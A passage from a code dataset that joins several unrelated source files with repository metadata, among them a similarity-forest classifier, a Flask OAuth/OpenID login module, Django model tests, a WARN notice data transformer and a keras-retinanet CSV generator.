right_gini = 1 - sum(right_val[key]**2 for key in right_val) / total_right**2
return (total_left * left_gini + total_right * right_gini) / (total_left + total_right)
def _find_split_point(self, X, y, x_i, x_j):
similarities = [self._sim_function(x_k, x_j) - self._sim_function(x_k, x_i) for x_k in X]
indices = sorted((i for i in range(len(y)) if not np.isnan(similarities[i])),
key=lambda x: similarities[x])
best_params = Params()
total_val = Counter(y)
left_val = defaultdict(lambda: 0)
n = len(indices)
for i in range(n - 1):
left_val[y[indices[i]]] += 1
right_val = Counter(total_val)
right_val.subtract(left_val)
split_gini = self._split_gini(i + 1, n - i - 1, left_val, right_val)
if split_gini < best_params.gini_q:
best_params.gini_q = split_gini
best_params.x_i = x_i
best_params.x_j = x_j
# best_params.split_point = (similarities[indices[i]] + similarities[indices[i + 1]]) / 2
best_params.split_point = similarities[indices[i]]
best_params.similarities = similarities
return best_params
def fit(self, X, y):
self.prediction = list(set(y))
if len(self.prediction) == 1:
self.prediction = self.prediction[0]
return self
if self._max_depth is not None and self._depth >= self._max_depth:
return self
best_params = Params()
for i, j in AxesSampler(y, self._random, self._r):
params = self._find_split_point(X, y, X[i], X[j])
if params.gini_q < best_params.gini_q:
best_params = params
if best_params.gini_q < 1:
self._x_i = best_params.x_i
self._x_j = best_params.x_j
self._split_point = best_params.split_point
X_left = X[best_params.similarities <= self._split_point, :]
X_right = X[best_params.similarities > self._split_point, :]
y_left = y[best_params.similarities <= self._split_point]
y_right = y[best_params.similarities > self._split_point]
if len(y_left) > 0 and len(y_right) > 0:
self._left = Node(self._depth + 1,
self._sim_function,
self._r,
self._max_depth,
self._random).fit(X_left, y_left)
self._right = Node(self._depth + 1,
self._sim_function,
self._r,
self._max_depth,
self._random).fit(X_right, y_right)
return self
def predict_probability_once(self, x):
if self._left is None and self._right is None:
return self.prediction, self._depth
elif self._sim_function(x, self._x_j) - self._sim_function(x, self._x_i) <= self._split_point:
return self._left.predict_probability_once(x)
elif self._sim_function(x, self._x_j) - self._sim_function(x, self._x_i) > self._split_point:
return self._right.predict_probability_once(x)
else:
return self.prediction, self._depth
def print(self):
if self._left is not None:
self._left.print()
if self._right is not None:
self._right.print()
if self._left is None and self._right is None:
print((self._depth, self.prediction))
def predict_probability(self, X):
return [self.predict_probability_once(x) for x in X.to_numpy()]
class SimilarityForest:
def __init__(self, n_estimators=20, similarity_function=np.dot, n_axes=1,
max_depth=None, random_state=None, frac=None):
self._n_estimators = n_estimators
self._sim_function = similarity_function
self._n_axes = n_axes
self._max_depth = max_depth
self._random = random_state
assert frac is None or 0 < frac <= 1
self.frac = frac
self._trees = None
self.classes = []
def _random_sample(self, X: pd.DataFrame, y: pd.DataFrame, n=None, frac=None):
"""
A random sampler.
Returns random sample from given dataset.
:param1 X: dataset
:param2 y: labels
:return: tuple
"""
if n is not None and frac is not None:
raise ValueError("Cannot use n and frac in the same time")
if frac is None and n is None:
return X.to_numpy(), y.to_numpy().T[0]
sample_x = X.sample(n=n, frac=frac, random_state=self._random)
sample_y = y.loc[sample_x.index]
return sample_x.to_numpy(), sample_y.to_numpy().T[0]
def fit(self, X: pd.DataFrame, y: pd.DataFrame):
assert len(X) == len(y)
self.classes = sorted(set(y.to_numpy().T[0]))
self._trees = [Node(1,
self._sim_function,
self._n_axes,
self._max_depth,
self._random).fit(*self._random_sample(X, y, frac=self.frac))
for _ in range(self._n_estimators)]
def predict_probability(self, X):
probs = [tree.predict_probability(X) for tree in self._trees]
probs = np.array(probs).T
depths = []
result = []
for line in probs[0]:
line = [i if type(i) != list else np.random.choice(i) for i in line]
c = Counter(line)
for k in c:
c[k] /= len(line)
tmp = [[k, c[k]] if k in c else [k, 0] for k in self.classes]
result.append(tmp)
for line in probs[1]:
depths.append(sum(line)/len(line))
for i in range(len(result)):
result[i] = [result[i], depths[i]]
return np.array(result)
def predict(self, X):
pred_probability = self.predict_probability(X)
return [sorted(x[0], key=lambda k: k[1], reverse=True)[0][0] for x in pred_probability]
def print(self):
self._trees[0].print()
| 36.312775
| 105
| 0.573214
|
cb882f33c6c43dacde11342276dc2053dc611048
| 293
|
py
|
Python
|
hackerrank/python/introduction/set_intersection_operation.py
|
mhetrerajat/ds-challenge
|
3208df5c29612b0dfe60c1c082da1f31ad220b49
|
[
"MIT"
] | null | null | null |
hackerrank/python/introduction/set_intersection_operation.py
|
mhetrerajat/ds-challenge
|
3208df5c29612b0dfe60c1c082da1f31ad220b49
|
[
"MIT"
] | 1
|
2021-05-18T07:30:16.000Z
|
2021-05-18T07:30:16.000Z
|
hackerrank/python/introduction/set_intersection_operation.py
|
mhetrerajat/ds-challenge
|
3208df5c29612b0dfe60c1c082da1f31ad220b49
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
if __name__ == "__main__":
nEnglish = int(raw_input())
englishStudents = set(map(int, raw_input().split(" ")))
nFrench = int(raw_input())
frenchStudents = set(map(int, raw_input().split(" ")))
print(len(englishStudents.intersection(frenchStudents)))
| 32.555556
| 60
| 0.668942
|
646719b747e4b10f29288a440a8bd92971dbb099
| 1,885
|
py
|
Python
|
neutron/api/rpc/callbacks/resources.py
|
cleo4zheng/neutron
|
6d65318308edfd984bdd0ff1ac7fef9486a040f7
|
[
"Apache-2.0"
] | 1
|
2019-06-02T06:15:39.000Z
|
2019-06-02T06:15:39.000Z
|
neutron/api/rpc/callbacks/resources.py
|
cleo4zheng/neutron
|
6d65318308edfd984bdd0ff1ac7fef9486a040f7
|
[
"Apache-2.0"
] | 1
|
2019-08-16T14:02:19.000Z
|
2019-08-16T14:02:19.000Z
|
neutron/api/rpc/callbacks/resources.py
|
cleo4zheng/neutron
|
6d65318308edfd984bdd0ff1ac7fef9486a040f7
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron.objects import network
from neutron.objects import ports
from neutron.objects.qos import policy
from neutron.objects import securitygroup
from neutron.objects import subnet
from neutron.objects import trunk
# Supported types
TRUNK = trunk.Trunk.obj_name()
QOS_POLICY = policy.QosPolicy.obj_name()
SUBPORT = trunk.SubPort.obj_name()
PORT = ports.Port.obj_name()
NETWORK = network.Network.obj_name()
SUBNET = subnet.Subnet.obj_name()
SECURITYGROUP = securitygroup.SecurityGroup.obj_name()
SECURITYGROUPRULE = securitygroup.SecurityGroupRule.obj_name()
_VALID_CLS = (
policy.QosPolicy,
trunk.Trunk,
trunk.SubPort,
ports.Port,
subnet.Subnet,
network.Network,
securitygroup.SecurityGroup,
securitygroup.SecurityGroupRule,
)
_TYPE_TO_CLS_MAP = {cls.obj_name(): cls for cls in _VALID_CLS}
LOCAL_RESOURCE_VERSIONS = {
resource_type: cls.VERSION
for resource_type, cls in _TYPE_TO_CLS_MAP.items()
}
def get_resource_type(resource_cls):
if not resource_cls:
return None
if not hasattr(resource_cls, 'obj_name'):
return None
return resource_cls.obj_name()
def is_valid_resource_type(resource_type):
return resource_type in _TYPE_TO_CLS_MAP
def get_resource_cls(resource_type):
return _TYPE_TO_CLS_MAP.get(resource_type)
| 28.134328
| 78
| 0.756499
|
2aa6d25d4dc3535d58d885316d5982f43e337ff7
| 5,560
|
py
|
Python
|
db/studentProjects/02_AkinwandeAtanda/Tweet_Analytics/045_TA03_02_binary_classification.py
|
chrislangst/scalable-data-science
|
c7beee15c7dd14d27353c4864d927c1b76cd2fa9
|
[
"Unlicense"
] | 138
|
2017-07-25T06:48:28.000Z
|
2022-03-31T12:23:36.000Z
|
db/studentProjects/02_AkinwandeAtanda/Tweet_Analytics/045_TA03_02_binary_classification.py
|
chrislangst/scalable-data-science
|
c7beee15c7dd14d27353c4864d927c1b76cd2fa9
|
[
"Unlicense"
] | 11
|
2017-08-17T13:45:54.000Z
|
2021-06-04T09:06:53.000Z
|
db/studentProjects/02_AkinwandeAtanda/Tweet_Analytics/045_TA03_02_binary_classification.py
|
chrislangst/scalable-data-science
|
c7beee15c7dd14d27353c4864d927c1b76cd2fa9
|
[
"Unlicense"
] | 74
|
2017-08-18T17:04:46.000Z
|
2022-03-21T14:30:51.000Z
|
# Databricks notebook source exported at Sun, 26 Jun 2016 01:45:30 UTC
# MAGIC %md
# MAGIC
# MAGIC # [Scalable Data Science](http://www.math.canterbury.ac.nz/~r.sainudiin/courses/ScalableDataScience/)
# MAGIC
# MAGIC
# MAGIC ### Course Project by [Akinwande Atanda](https://nz.linkedin.com/in/akinwande-atanda)
# MAGIC
# MAGIC *supported by* [](https://databricks.com/)
# MAGIC and
# MAGIC [](https://www.awseducate.com/microsite/CommunitiesEngageHome)
# COMMAND ----------
# MAGIC %md
# MAGIC The [html source url](https://raw.githubusercontent.com/raazesh-sainudiin/scalable-data-science/master/db/studentProjects/02_AkinwandeAtanda/Tweet_Analytics/045_TA03_02_binary_classification.html) of this databricks notebook and its recorded Uji :
# MAGIC
# MAGIC [](https://www.youtube.com/v/zJirlHAV6YU?rel=0&autoplay=1&modestbranding=1&start=0&end=1611)
# COMMAND ----------
# MAGIC %md
# MAGIC #Tweet Analytics
# MAGIC
# MAGIC [Presentation contents](https://github.com/aaa121/Spark-Tweet-Streaming-Presentation-May-2016).
# COMMAND ----------
# MAGIC %md
# MAGIC ## Creating Machine Learning Pipeline without Loop
# MAGIC
# MAGIC * The elasticNetParam coefficient is fixed at 1.0
# MAGIC * Read the Spark ML documentation for Logistic Regression
# MAGIC * The dataset "pos_neg_category" can be split into two or three categories as done in the next note. In this note, the dataset is randomly split into training and testing data
# MAGIC * This notebook can be upload to create a job for scheduled training and testing of the logistic classifier algorithm
# COMMAND ----------
# MAGIC %md
# MAGIC #### Import the required python libraries:
# MAGIC * From PySpark Machine Learning module import the following packages:
# MAGIC * Pipeline;
# MAGIC * binarizer, tokenizer and hash tags from feature package;
# MAGIC * logistic regression from regression package;
# MAGIC * Multi class evaluator from evaluation package
# MAGIC * Read the [PySpark ML package](http://spark.apache.org/docs/latest/ml-classification-regression.html#logistic-regression) documentation for more details
# COMMAND ----------
from pyspark.ml import *
from pyspark.ml import Pipeline
from pyspark.ml.feature import *
from pyspark.ml.classification import *
from pyspark.ml.tuning import *
from pyspark.ml.evaluation import *
from pyspark.ml.regression import *
# COMMAND ----------
# MAGIC %md
# MAGIC #### Set the Stages (Binarizer, Tokenizer, Hash Text Features, and Logistic Regression Classifier Model)
# COMMAND ----------
bin = Binarizer(inputCol = "category", outputCol = "label", threshold = 0.5) # Positive reviews > 0.5 threshold
tok = Tokenizer(inputCol = "review", outputCol = "word") #Note: The column "words" in the original table can also contain sentences that can be tokenized
hashTF = HashingTF(inputCol = tok.getOutputCol(), numFeatures = 50000, outputCol = "features")
lr = LogisticRegression(maxIter = 10, regParam = 0.0001, elasticNetParam = 1.0)
pipeline = Pipeline(stages = [bin, tok, hashTF, lr])
# COMMAND ----------
# MAGIC %md
# MAGIC #### Convert the imported featurized dataset to dataframe
# COMMAND ----------
df = table("pos_neg_category")
# COMMAND ----------
# MAGIC %md
# MAGIC #### Randomly split the dataframe into training and testing set
# COMMAND ----------
(trainingData, testData) = df.randomSplit([0.7, 0.3])
# COMMAND ----------
# MAGIC %md
# MAGIC #### Fit the training dataset into the pipeline
# COMMAND ----------
model = pipeline.fit(trainingData)
# COMMAND ----------
# MAGIC %md
# MAGIC #### Test the predictability of the fitted algorithm with test dataset
# COMMAND ----------
predictionModel=model.transform(testData)
# COMMAND ----------
display(predictionModel.select("label","prediction", "review", "probability")) # Prob of being 0 (negative) against 1 (positive)
# COMMAND ----------
predictionModel.select("label","prediction", "review", "probability").show(10) # Prob of being 0 (negative) against 1 (positive)
# COMMAND ----------
# MAGIC %md
# MAGIC #### Assess the accuracy of the algorithm
# COMMAND ----------
evaluator = MulticlassClassificationEvaluator(
labelCol="label", predictionCol="prediction", metricName="precision")
accuracy = evaluator.evaluate(predictionModel)
print("Logistic Regression Classifier Accuracy Rate = %g " % (accuracy))
print("Test Error = %g " % (1.0 - accuracy))
# COMMAND ----------
# MAGIC %md
# MAGIC
# MAGIC # [Scalable Data Science](http://www.math.canterbury.ac.nz/~r.sainudiin/courses/ScalableDataScience/)
# MAGIC
# MAGIC
# MAGIC ### Course Project by [Akinwande Atanda](https://nz.linkedin.com/in/akinwande-atanda)
# MAGIC
# MAGIC *supported by* [](https://databricks.com/)
# MAGIC and
# MAGIC [](https://www.awseducate.com/microsite/CommunitiesEngageHome)
| 39.432624
| 407
| 0.730036
|
54f399138f9970a8ae1c08a5a0505fd0fc8921f6
| 11,134
|
py
|
Python
|
acoustic/web/views/user.py
|
DavisDevasia/acoustid-server
|
b4b2acbc198b3d0497df04c2294d9f030133ede5
|
[
"MIT"
] | null | null | null |
acoustic/web/views/user.py
|
DavisDevasia/acoustid-server
|
b4b2acbc198b3d0497df04c2294d9f030133ede5
|
[
"MIT"
] | null | null | null |
acoustic/web/views/user.py
|
DavisDevasia/acoustid-server
|
b4b2acbc198b3d0497df04c2294d9f030133ede5
|
[
"MIT"
] | null | null | null |
import json
import base64
import urllib2
import logging
import random
from itsdangerous import URLSafeSerializer
from rauth import OAuth2Service
from openid import oidutil, fetchers
from openid.consumer import consumer as openid
from openid.extensions import ax, sreg
from flask import Blueprint, render_template, request, redirect, url_for, abort, current_app, session
from acoustic.web import db
from acoustic.web.utils import require_user, is_our_url
from acoustic.models import Account, AccountOpenID, AccountGoogle
from acoustic.utils import generate_api_key
from acoustic.data.account import (
lookup_account_id_by_mbuser,
lookup_account_id_by_openid,
insert_account,
get_account_details,
reset_account_apikey,
update_account_lastlogin,
is_moderator,
)
logger = logging.getLogger(__name__)
user_page = Blueprint('user', __name__)
# monkey-patch uidutil.log to use the standard logging framework
openid_logger = logging.getLogger('openid')
def log_openid_messages(message, level=0):
openid_logger.info(message)
oidutil.log = log_openid_messages
# force the use urllib2 with a timeout
fetcher = fetchers.Urllib2Fetcher()
fetcher.urlopen = lambda req: urllib2.urlopen(req, timeout=5)
fetchers.setDefaultFetcher(fetcher)
@user_page.route('/login', methods=['GET', 'POST'])
def login():
if 'id' in session:
return redirect(url_for('general.index'))
errors = list(request.args.getlist('error'))
if request.method == 'POST':
login_method = request.form.get('login')
if login_method == 'musicbrainz':
return musicbrainz_login()
elif login_method == 'google':
return google_login()
elif login_method == 'openid':
return openid_login()
return render_template('login.html', errors=errors,
return_url=request.values.get('return_url'))
def find_or_create_musicbrainz_user(mb_user_name):
user = db.session.query(Account).filter_by(mbuser=mb_user_name).first()
if user is not None:
return user
user = Account()
user.name = mb_user_name
user.mbuser = mb_user_name
user.apikey = generate_api_key()
user.submission_count = 0
db.session.add(user)
db.session.flush()
return user
def login_user_and_redirect(user_id, return_url=None):
session['id'] = user_id
if not return_url:
return_url = request.values.get('return_url')
if return_url and is_our_url(return_url):
return redirect(return_url)
return redirect(url_for('general.index'))
def handle_musicbrainz_oauth2_login():
musicbrainz = OAuth2Service(
name='musicbrainz',
client_id=current_app.config['MB_OAUTH_CLIENT_ID'],
client_secret=current_app.config['MB_OAUTH_CLIENT_SECRET'],
base_url='https://musicbrainz.org',
authorize_url='https://musicbrainz.org/oauth2/authorize',
access_token_url='https://musicbrainz.org/oauth2/token',
)
serializer = URLSafeSerializer(current_app.config['SECRET_KEY'])
code = request.args.get('code')
if not code:
token = str(random.getrandbits(64))
session['mb_login_token'] = token
url = musicbrainz.get_authorize_url(**{
'response_type': 'code',
'scope': 'profile',
'redirect_uri': url_for('.musicbrainz_login', _external=True),
'state': serializer.dumps({
'return_url': request.values.get('return_url'),
'token': token,
}),
})
return redirect(url)
serialized_state = request.args.get('state')
if serialized_state:
state = serializer.loads(serialized_state)
else:
state = {}
token = session.get('mb_login_token')
if not token:
raise Exception('token not found in session')
if token != state.get('token'):
raise Exception('token from session does not match token from oauth2 state')
auth_session = musicbrainz.get_auth_session(data={
'grant_type': 'authorization_code',
'code': code,
'redirect_uri': url_for('.musicbrainz_login', _external=True),
}, decoder=json.loads)
response = auth_session.get('oauth2/userinfo').json()
user = find_or_create_musicbrainz_user(response['sub'])
logger.info('MusicBrainz user %s "%s" logged in', user.id, user.name)
return login_user_and_redirect(user.id, return_url=state.get('return_url'))
@user_page.route('/login/musicbrainz')
def musicbrainz_login():
try:
response = handle_musicbrainz_oauth2_login()
db.session.commit()
except Exception:
logger.exception('MusicBrainz login failed')
db.session.rollback()
return redirect(url_for('.login', error='MusicBrainz login failed'))
return response
def handle_openid_login_request():
openid_url = request.form['openid_identifier']
try:
consumer = openid.Consumer(session, None)
openid_req = consumer.begin(openid_url)
except openid.DiscoveryFailure:
logger.exception('Error in OpenID discovery')
raise
else:
if openid_req is None:
raise Exception('No OpenID services found for the given URL')
else:
ax_req = ax.FetchRequest()
ax_req.add(ax.AttrInfo('http://schema.openid.net/contact/email',
alias='email'))
ax_req.add(ax.AttrInfo('http://axschema.org/namePerson/friendly',
alias='nickname'))
openid_req.addExtension(ax_req)
url = openid_req.redirectURL(get_openid_realm(),
url_for('.openid_login', return_url=request.values.get('return_url'), _external=True))
return redirect(url)
raise Exception('OpenID login failed')
def handle_openid_login_response():
conn = db.session.connection()
consumer = openid.Consumer(session, None)
info = consumer.complete(request.args, request.url)
if info.status == openid.SUCCESS:
openid_url = info.identity_url
values = {}
ax_resp = ax.FetchResponse.fromSuccessResponse(info)
if ax_resp:
attrs = {
'email': 'http://schema.openid.net/contact/email',
'name': 'http://schema.openid.net/namePerson/friendly',
}
for name, uri in attrs.iteritems():
try:
value = ax_resp.getSingle(uri)
if value:
values[name] = value
except KeyError:
pass
account_id = lookup_account_id_by_openid(conn, openid_url)
if not account_id:
account_id, account_api_key = insert_account(conn, {
'name': 'OpenID User',
'openid': openid_url,
})
logger.info("Successfuly identified OpenID user %s (%d) with email '%s' and nickname '%s'",
openid_url, account_id, values.get('email', ''), values.get('name', ''))
return login_user_and_redirect(account_id)
elif info.status == openid.CANCEL:
raise Exception('OpenID login has been canceled')
else:
raise Exception('OpenID login failed')
def handle_openid_login():
if 'openid.mode' in request.args:
return handle_openid_login_response()
else:
return handle_openid_login_request()
@user_page.route('/login/openid')
def openid_login():
try:
response = handle_openid_login()
db.session.commit()
except Exception:
logger.exception('OpenID login failed')
db.session.rollback()
return redirect(url_for('.login', error='OpenID login failed'))
return response
def get_openid_realm():
return url_for('general.index', _external=True).rstrip('/')
def find_or_create_google_user(google_user_id, openid=None):
user = db.session.query(Account).join(AccountGoogle).\
filter(AccountGoogle.google_user_id == google_user_id).first()
if user is not None:
return user
if openid is not None:
user = db.session.query(Account).join(AccountOpenID).\
filter(AccountOpenID.openid == openid).first()
if user is not None:
db.session.query(AccountOpenID).\
filter(AccountOpenID.openid == openid).delete()
logger.info("Migrated OpenID user %s to Google user %s", openid, google_user_id)
if user is None:
user = Account()
user.name = 'Google Account'
user.apikey = generate_api_key()
user.submission_count = 0
db.session.add(user)
db.session.flush()
logger.info("Created user %s (%s)", user.id, user.name)
google_user = AccountGoogle()
google_user.account = user
google_user.google_user_id = google_user_id
db.session.add(google_user)
logger.info("Associated user %s (%s) with Google user %s", user.id, user.name, google_user_id)
return user
def handle_google_oauth2_login():
google = OAuth2Service(
name='google',
client_id=current_app.config['GOOGLE_OAUTH_CLIENT_ID'],
client_secret=current_app.config['GOOGLE_OAUTH_CLIENT_SECRET'],
base_url='https://google.com',
authorize_url='https://accounts.google.com/o/oauth2/auth',
access_token_url='https://www.googleapis.com/oauth2/v3/token',
)
code = request.args.get('code')
if not code:
url = google.get_authorize_url(**{
'response_type': 'code',
'access_type': 'online',
'scope': 'openid',
'redirect_uri': url_for('.google_login', _external=True),
'openid.realm': get_openid_realm(),
})
return redirect(url)
response = json.loads(google.get_raw_access_token(data={
'grant_type': 'authorization_code',
'code': code,
'redirect_uri': url_for('.google_login', _external=True),
}).content)
header, payload, secret = str(response['id_token']).split('.')
payload += '=' * (4 - (len(payload) % 4))
id_token = json.loads(base64.urlsafe_b64decode(payload))
user = find_or_create_google_user(
id_token['sub'], id_token.get('openid_id'))
logger.info('Google user %s "%s" logged in', user.id, user.name)
return login_user_and_redirect(user.id)
@user_page.route('/login/google')
def google_login():
try:
response = handle_google_oauth2_login()
db.session.commit()
except Exception:
logger.exception('Google login failed')
db.session.rollback()
return redirect(url_for('.login', error='Google authentication failed'))
return response
@user_page.route('/logout')
def logout():
if 'id' in session:
del session['id']
return redirect(url_for('general.index'))
@user_page.route('/api-key')
def api_key():
user = require_user()
return render_template('apikey.html', title='Your API Key',
apikey=user.apikey)
@user_page.route('/new-api-key')
def new_api_key():
user = require_user()
user.apikey = generate_api_key()
db.session.commit()
return redirect(url_for('.api_key'))
| 33.136905
| 102
| 0.65529
|
1903cc3eecd36054eed8682d76b0a1dbdc45ce2e
| 2,084
|
py
|
Python
|
warn_transformer/transformers/ak.py
|
chriszs/warn-transformer
|
62b6dc9116a81daefff424e2118e4a66ee642ba3
|
[
"Apache-2.0"
] | 3
|
2022-02-18T22:21:00.000Z
|
2022-03-24T21:24:29.000Z
|
warn_transformer/transformers/ak.py
|
chriszs/warn-transformer
|
62b6dc9116a81daefff424e2118e4a66ee642ba3
|
[
"Apache-2.0"
] | 20
|
2022-02-20T01:00:07.000Z
|
2022-03-25T18:18:56.000Z
|
warn_transformer/transformers/ak.py
|
chriszs/warn-transformer
|
62b6dc9116a81daefff424e2118e4a66ee642ba3
|
[
"Apache-2.0"
] | 2
|
2022-02-25T02:50:00.000Z
|
2022-03-14T16:32:22.000Z
|
import typing
from datetime import datetime
from ..schema import BaseTransformer
class Transformer(BaseTransformer):
"""Transform Alaska raw data for consolidation."""
postal_code = "AK"
fields = dict(
company="Company",
location="Location",
notice_date="Notice Date",
effective_date="Layoff Date",
jobs="Employees Affected",
)
date_format = "%m/%d/%y"
date_corrections = {
"9/30/20*": datetime(2020, 9, 30),
"August-November 2021": datetime(2021, 8, 1),
"4/1/20 5/31/20": datetime(2020, 4, 1),
"Varied": None,
"March to May 2016": datetime(2016, 3, 1),
"various": None,
}
jobs_corrections = {
"Up to 300": 300,
}
def transform_date(self, value: str) -> typing.Optional[str]:
"""Transform a raw date string into a date object.
Args:
value (str): The raw date string provided by the source
Returns: A date object ready for consolidation. Or, if the date string is invalid, a None.
"""
try:
dt = self.date_corrections[value]
if dt:
return str(dt.date())
else:
assert dt is None
return dt
except KeyError:
pass
value = value.strip()
value = value.split(" to ")[0].strip()
value = value.replace("Starting ", "").strip()
return super().transform_date(value)
def check_if_temporary(self, row: typing.Dict) -> typing.Optional[bool]:
"""Determine whether a row is a temporary or not.
Args:
row (dict): The raw row of data.
Returns: A boolean or null
"""
return "temporary" in row["Notes"].lower() or None
def check_if_closure(self, row: typing.Dict) -> typing.Optional[bool]:
"""Determine whether a row is a closure or not.
Args:
row (dict): The raw row of data.
Returns: A boolean or null
"""
return "closure" in row["Notes"].lower() or None
| 28.944444
| 98
| 0.56382
|
63da5f1971dd5050ed3ea04dacf71b02630ce3b9
| 2,735
|
py
|
Python
|
app/core/tests/test_models.py
|
andrewtdunn/recipe-app-api
|
f46775563b32399d792fb2f93801e9432ef0a71a
|
[
"MIT"
] | null | null | null |
app/core/tests/test_models.py
|
andrewtdunn/recipe-app-api
|
f46775563b32399d792fb2f93801e9432ef0a71a
|
[
"MIT"
] | null | null | null |
app/core/tests/test_models.py
|
andrewtdunn/recipe-app-api
|
f46775563b32399d792fb2f93801e9432ef0a71a
|
[
"MIT"
] | null | null | null |
from unittest.mock import patch
from django.test import TestCase
from django.contrib.auth import get_user_model
from core import models
def sample_user(email='test@andrewtdunn.com', password='testpass'):
"""Create a sample user."""
return get_user_model().objects.create_user(email, password)
class ModelTests(TestCase):
def test_create_user_with_email_successful(self):
"""Test creating a new user with an email is successful."""
email = "test@andrewtdunn.com"
password = "Testpass123"
user = get_user_model().objects.create_user(
email=email,
password=password
)
self.assertEqual(user.email, email)
self.assertTrue(user.check_password(password))
def test_new_user_email_normalized(self):
"""Test the email for a new user is normalized."""
email = "test@ANDREWTDUNN.COM"
user = get_user_model().objects.create_user(email, "TEST123")
self.assertEqual(user.email, user.email.lower())
def test_new_user_invalid_email(self):
"""Test creating user with no email raises error"""
with self.assertRaises(ValueError):
get_user_model().objects.create_user(None, "Password123")
def test_create_new_superuser(self):
"""Test creating a new superuser."""
user = get_user_model().objects.create_superuser(
'test@andrewtdunn.com',
'test123'
)
self.assertTrue(user.is_superuser)
self.assertTrue(user.is_staff)
def test_tag_str(self):
"""Test tag stream representation."""
tag = models.Tag.objects.create(
user=sample_user(),
name='Vegan',
)
self.assertEqual(str(tag), tag.name)
def test_ingredient_str(self):
"""Test the ingredient string representation"""
ingredient = models.Ingredient.objects.create(
user=sample_user(),
name='Cucumber'
)
self.assertEqual(str(ingredient), ingredient.name)
def test_recipe_str(self):
"""Test the recipe string representation"""
recipe = models.Recipe.objects.create(
user=sample_user(),
title='Steak and Mushroom Sauce',
time_minutes=5,
price=5.00
)
self.assertEqual(str(recipe), recipe.title)
@patch('uuid.uuid4')
def test_recipe_file_name_uuid(self, mock_uuid):
"""Test that image is saved in the correct location"""
uuid = 'test-uuid'
mock_uuid.return_value = uuid
file_path = models.recipe_image_file_path(None, 'myimage.jpg')
exp_path = f'uploads/recipe/{uuid}.jpg'
self.assertEqual(file_path, exp_path)
| 32.176471
| 70
| 0.640585
|
c7ece0246694c9bc4eebbe4f69e5888bf801180b
| 1,579
|
py
|
Python
|
pythonx/vim_textobj_block_party/block_party/tests/test_search.py
|
ColinKennedy/vim-textobj-block-party
|
c3132b63840d2ff9719e3972dd8e5548d40165c5
|
[
"MIT"
] | 7
|
2018-10-22T14:10:08.000Z
|
2020-05-16T18:07:07.000Z
|
pythonx/vim_textobj_block_party/block_party/tests/test_search.py
|
ColinKennedy/vim-textobj-block-party
|
c3132b63840d2ff9719e3972dd8e5548d40165c5
|
[
"MIT"
] | 5
|
2018-10-22T18:53:41.000Z
|
2018-12-31T18:54:04.000Z
|
pythonx/vim_textobj_block_party/block_party/tests/test_search.py
|
ColinKennedy/vim-textobj-block-party
|
c3132b63840d2ff9719e3972dd8e5548d40165c5
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''Any test that is related to inspecting Python source-code.'''
# IMPORT STANDARD LIBRARIES
import textwrap
# IMPORT THIRD-PARTY LIBRARIES
from block_party import config
# IMPORT LOCAL LIBRARIES
from . import common
class Blocks(common.Common):
'''A series of tests for finding lines that are related to the current block.'''
def setUp(self):
'''Reset the user's config before every test.'''
super(Blocks, self).setUp()
config.reset()
def test_search_off(self):
'''Run a test without searching.'''
code = textwrap.dedent(
'''\
items = [x for x in whatever]
|start|for index in items:
print('running')
# foobar
|cursor|
print('index {}'.format(index))|end|
last = 'bit is here'
'''
)
self.compare(code)
def test_search_whitespace(self):
'''Run a test with searching and whitespace allowed.'''
config.register_setting(config.WHITESPACE_KEY, lambda: True)
config.register_setting(config.SEARCH_KEY, lambda: False)
code = textwrap.dedent(
'''\
items = [x for x in whatever]
|start|
for index in items:
print('running')
# foobar
|cursor|
print('index {}'.format(index))|end|
last = 'bit is here'
'''
)
self.compare(code, search=True)
| 22.557143
| 84
| 0.540215
|
a510bc119b6a87c9bb2499e1bd99a24776bff55d
| 8,225
|
py
|
Python
|
keras_retinanet/preprocessing/csv_generator.py
|
Sid51/keras-retinanet
|
3bf7ad6aad0a5d55b7c3a7b81fb6f151042659cc
|
[
"Apache-2.0"
] | null | null | null |
keras_retinanet/preprocessing/csv_generator.py
|
Sid51/keras-retinanet
|
3bf7ad6aad0a5d55b7c3a7b81fb6f151042659cc
|
[
"Apache-2.0"
] | null | null | null |
keras_retinanet/preprocessing/csv_generator.py
|
Sid51/keras-retinanet
|
3bf7ad6aad0a5d55b7c3a7b81fb6f151042659cc
|
[
"Apache-2.0"
] | null | null | null |
"""
Copyright 2017-2018 yhenon (https://github.com/yhenon/)
Copyright 2017-2018 Fizyr (https://fizyr.com)
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from .generator import Generator
from ..utils.image import read_image_bgr
import numpy as np
from PIL import Image
from six import raise_from
import csv
import sys
import os.path
from collections import OrderedDict
def _parse(value, function, fmt):
"""
Parse a string into a value, and format a nice ValueError if it fails.
Returns `function(value)`.
Any `ValueError` raised is catched and a new `ValueError` is raised
with message `fmt.format(e)`, where `e` is the caught `ValueError`.
"""
try:
return function(value)
except ValueError as e:
raise_from(ValueError(fmt.format(e)), None)
def _read_classes(csv_reader):
""" Parse the classes file given by csv_reader.
"""
result = OrderedDict()
for line, row in enumerate(csv_reader):
line += 1
try:
class_name, class_id = row
except ValueError:
raise_from(ValueError('line {}: format should be \'class_name,class_id\''.format(line)), None)
class_id = _parse(class_id, int, 'line {}: malformed class ID: {{}}'.format(line))
if class_name in result:
raise ValueError('line {}: duplicate class name: \'{}\''.format(line, class_name))
result[class_name] = class_id
return result
def _read_annotations(csv_reader, classes):
""" Read annotations from the csv_reader.
"""
result = OrderedDict()
for line, row in enumerate(csv_reader):
line += 1
try:
img_file1, img_file2, x1, y1, x2, y2, class_name = row[:7]
except ValueError:
raise_from(ValueError('line {}: format should be \'img_file1,img_file2,x1,y1,x2,y2,class_name\' '
